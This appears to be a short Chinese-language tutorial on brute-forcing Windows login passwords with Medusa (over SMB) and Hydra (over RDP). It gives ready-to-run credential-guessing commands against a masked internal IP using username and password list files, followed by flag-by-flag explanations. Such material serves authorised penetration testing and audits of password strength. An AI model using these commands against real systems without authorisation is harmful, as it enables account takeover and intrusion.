测试工具我使用2种(Medusa和hydra):
第一种:Medusa支持端口登录但是不支持rdp协议,意思就是可以验证密码是否正确,新用户不会创建家目录:
使用方法:
medusa -M smbnt -h 172.18.x.x -U user.list -P pass.list -T 1 -e ns -O good.txt -r 0
命令参数解释:
-h [TEXT] 目标IP -H [FILE] 目标主机文件 -u [TEXT] 用户名 -U [FILE] 用户名文件 -p [TEXT] 密码 -P [FILE] 密码文件 -C [FILE] 组合条目文件 -O [FILE] 文件日志信息 -e [n/s/ns] N意为空密码,S意为密码与用户名相同 -M [TEXT] 模块执行名称 -m [TEXT] 传递参数到模块 -d 显示所有的模块名称 -n [NUM] 使用非默认端口 -s 启用SSL -r [NUM] 重试间隔时间,默认为3秒 -t [NUM] 设定线程数量 -L 并行化,每个用户使用一个线程 -f 在任何主机上找到第一个账号/密码后,停止破解 -q 显示模块的使用信息 -v [NUM] 详细级别(0-6) -w [NUM] 错误调试级别(0-10) -V 显示版本 -Z [TEXT] 继续扫描上一次
第二种:hydra是一款全能的暴力破解工具,功能强大,几乎支持所有的协议,使用这个工具会给windows用户创建家目录。
hydra 172.18.x.x rdp -L user.list -P pass.list -V -o good.txt
命令参数解释:
hydra [[[-l login|-L file] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w time] [-f] [-s PORT] [-S] [-vV] server service [OPT] -R 继续从上一次进度接着破解。 -S 采用SSL链接。 -s PORT 可通过这个参数指定非默认端口。 -l LOGIN 指定破解的用户,对特定用户破解。 -L FILE 指定用户名字典。 -p PASS 小写,指定密码破解,少用,一般是采用密码字典。 -P FILE 大写,指定密码字典。 -e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。 -C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。 -M FILE 指定目标列表文件一行一条。 -o FILE 指定结果输出文件。 -f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。 -t TASKS 同时运行的线程数,默认为16。 -w TIME 设置最大超时的时间,单位秒,默认是30s。 -v / -V 显示详细过程。